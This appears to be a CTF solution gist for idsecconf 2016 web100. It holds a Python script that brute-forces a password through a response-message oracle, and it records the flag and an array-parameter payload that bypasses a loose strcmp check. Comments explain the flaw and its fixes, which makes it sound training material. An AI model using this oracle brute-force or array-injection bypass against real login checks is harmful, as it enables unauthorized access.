Created
August 27, 2016 10:16
idsecconf CTF 2016 - web100
#!/usr/bin/env python | |
import requests | |
import string | |
import re | |
# Candidate symbols tried at every position: A-Z, then a-z, then 0-9.
alpha = "".join([string.ascii_uppercase, string.ascii_lowercase, string.digits])
# CTF challenge endpoint (plain HTTP); each guess is appended as the value
# of the `password` query parameter.
url = 'http://128.199.96.39/?password='
# Matches the literal text "invalid " followed by a single digit.
m = re.compile('invalid [0-9]')
# Working guess, one list slot per character; starts out as "aaaa".
password = list('aaaa')
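def send_request(password):
    """Fetch the challenge URL for one guess and return the server's verdict.

    Args:
        password: Candidate password string; appended unescaped to the
            module-level ``url``.

    Returns:
        The first ``invalid <digit>`` substring found in the response body.

    Raises:
        IndexError: If the response body contains no ``invalid <digit>``
            text. Nothing in this script catches it, so the run stops there.
        requests.exceptions.RequestException: On connection errors or when
            the request times out.
    """
    target = url + password
    # Bounded wait: without a timeout requests.get() can block indefinitely
    # on an unresponsive host.
    r = requests.get(target, timeout=10)
    print(target)
    return m.findall(r.text)[0]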
# Recover the password one position at a time. The "invalid N" reply is used
# as a progress signal (presumably it reflects how far the server-side
# comparison got), so the search needs at most 4 * 62 = 248 requests rather
# than 62**4 blind guesses. Defensive reading: a check whose failure response
# reveals where the comparison stopped gives the secret away one character
# at a time; a uniform failure response and attempt limiting remove that
# signal.
for i in range(4):
    char = ""
    index = 0
    # Positions 0-2 stop on "invalid 1" / "invalid 2" / "invalid 3"
    # respectively. Position 3 has no stop condition, so every symbol is
    # tried unless send_request raises first.
    marker = 'invalid %d' % (i + 1) if i < 3 else None
    for j in alpha:
        # Alias, not a copy: writing tmp_pass[i] also updates `password`,
        # which is how an accepted character carries into the next round.
        tmp_pass = password
        tmp_pass[i] = j
        f = send_request("".join(tmp_pass))
        print(f)
        if marker is not None and marker in f:
            index, char = i, j
            print(char)
            break
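'''
==
http://128.199.96.39/?password=Ungu
The Flag is: flag{AVariant_Of_Strcmp}
==
Intended solution:
http://128.199.96.39/?password[][]=1&password[][]=1&password[][]=1&password[][]=1
(Presumably this works because the parameter reaches the server as an array
rather than a string, so a loosely compared strcmp()-style check no longer
fails; the server code is not shown here. Rejecting non-string input and
comparing strictly closes that path.)
'''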